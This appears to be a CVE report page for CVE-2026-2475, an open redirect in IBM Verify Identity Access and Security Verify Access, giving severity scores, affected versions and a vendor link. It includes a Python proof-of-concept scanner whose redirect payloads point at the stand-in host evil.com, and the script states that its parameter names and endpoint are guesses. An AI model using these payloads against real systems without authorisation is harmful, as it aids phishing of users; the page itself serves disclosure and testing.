Security Vulnerability Report
CVE-2026-2475 CVSS 3.1 LOW

CVE-2026-2475

Published: 2026-04-01 21:16:59
Last Modified: 2026-04-07 16:31:56

Description

IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability. An attacker could exploit this vulnerability using a specially crafted request to redirect a victim to arbitrary Web sites.

CVSS Details

CVSS Score (IBM, secondary source): 3.1
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N
NVD Score (primary source): 4.7 MEDIUM
NVD Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N (NVD rates attack complexity as low and scope as changed, hence the higher score)
Weakness: CWE-601 (URL Redirection to Untrusted Site, "Open Redirect")

Configurations (Affected Products)

IBM Security Verify Access 10.0 through 10.0.9.1
  cpe:2.3:a:ibm:security_verify_access:*:*:*:*:*:*:*:* - VULNERABLE (10.0.0.0 through 10.0.9.1)
IBM Security Verify Access Container 10.0 through 10.0.9.1
  cpe:2.3:a:ibm:security_verify_access_container:*:*:*:*:*:*:*:* - VULNERABLE (10.0.0.0 through 10.0.9.1)
IBM Verify Identity Access 11.0 through 11.0.2
  cpe:2.3:a:ibm:verify_identity_access:*:*:*:*:*:*:*:* - VULNERABLE (11.0.0.0 through 11.0.2.0)
IBM Verify Identity Access Container 11.0 through 11.0.2
  cpe:2.3:a:ibm:verify_identity_access_container:*:*:*:*:*:*:*:* - VULNERABLE (11.0.0.0 through 11.0.2.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-2475 (Open Redirect)
# Target: IBM Verify Identity Access / Security Verify Access
# Note: the parameter names and endpoint below are generic guesses used by this
# script; the IBM advisory does not name the affected parameter or endpoint.
import requests


def test_open_redirect(target_url):
    """
    Tests for open redirect vulnerability by injecting a malicious redirect parameter.
    """
    # Common parameters that might be vulnerable
    params = [
        {"url": "https://evil.com"},
        {"redirect": "https://evil.com"},
        {"next": "//evil.com"},
        {"target": "//evil.com"},
        {"goto": "https://evil.com"},
    ]
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                      "(KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }
    for param_set in params:
        try:
            # Send GET request with the payload; do not follow redirects so the
            # Location header of the first response can be inspected
            response = requests.get(target_url, params=param_set,
                                    headers=headers, allow_redirects=False)
            # Check if the Location header contains the evil domain
            if response.status_code in [301, 302, 303, 307, 308]:
                location = response.headers.get("Location", "")
                if "evil.com" in location:
                    print("[+] Vulnerable Found!")
                    print(f"    Parameter: {param_set}")
                    print(f"    Redirect Location: {location}")
                    return True
        except Exception as e:
            print(f"Error testing {param_set}: {e}")
    print("[-] No open redirect detected with common payloads.")
    return False


if __name__ == "__main__":
    # Replace with the actual vulnerable endpoint
    target = "http://target-host/iva/sso/oauth20/authorize"  # Example endpoint
    test_open_redirect(target)
```

References

https://www.ibm.com/support/pages/node/7268253 (IBM Support, Vendor Advisory)
